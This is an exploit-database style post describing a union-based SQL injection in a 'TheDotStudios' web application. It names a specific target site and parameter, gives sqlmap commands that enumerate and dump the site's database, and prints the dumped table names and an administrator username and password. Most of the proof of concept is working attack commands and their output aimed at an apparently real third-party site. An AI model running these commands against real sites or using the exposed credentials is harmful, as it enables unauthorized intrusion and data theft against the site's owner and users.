# Exploit Title: TheDotStudios Web Application Union-based Sql Injection # Date: 2025-01-04 # Exploit Author: Parastou Razi # Contact: razi.parastoo@gmail.com #Category:webapps #Tested On: Windows, Firefox Proof of Concept: 1. Description: When an application is vulnerable to SQL injection, and the results of the query are returned within the application's responses, you can use the UNION keyword to retrieve data from other tables within the database. This is commonly known as a SQL injection UNION attack. Union-based SQLi – the attacker uses the UNION operator to combine a benign SQL statement with a malicious statement. The malicious statement must use the same columns and data types as the original statement. A vulnerable database processes the combined statement and executes the malicious code. [+] For UNION-Based Sql Injection first add "'" to the end of the link and page information will change : https://thangam5g.com/product-view.php?id=20 https://thangam5g.com/product-view.php?id=20' 2. Proof #Demo 1: sudo sqlmap -u https://thangam5g.com/product-view.php?id=20 -p id --random-agent --level=5 --risk=3 --force-ssl --ignore-code=500 dbms=MySQL -tamper=space2comment --forms --batch --crawl=10 --threads=10 --answers="follow=Y" -D u915722082_thangam_db --tables sudo sqlmap -u https://thangam5g.com/product-view.php?id=20 -p id --random-agent --level=5 --risk=3 --force-ssl --ignore-code=500 dbms=MySQL -tamper=space2comment --crawl=10 --threads=10 --answers="follow=Y" -D u915722082_thangam_db --tables | tbl_admin | | tbl_category | | tbl_category2 | | tbl_category3 | | tbl_images | | tbl_meeting | | tbl_products | | tbl_quote | | tbl_review sudo sqlmap -u https://thangam5g.com/product-view.php?id=20 -p id --random-agent --level=5 --risk=3 --force-ssl --ignore-code=500 dbms=MySQL -tamper=space2comment --crawl=10 --threads=10 --answers="follow=Y" -D u915722082_thangam_db --tables -T tbl_admin --dump +-----+-------+-------+ | aid | aname | apass | +-----+-------+-------+ | 1 | admin | admin | +-----+-------+-------+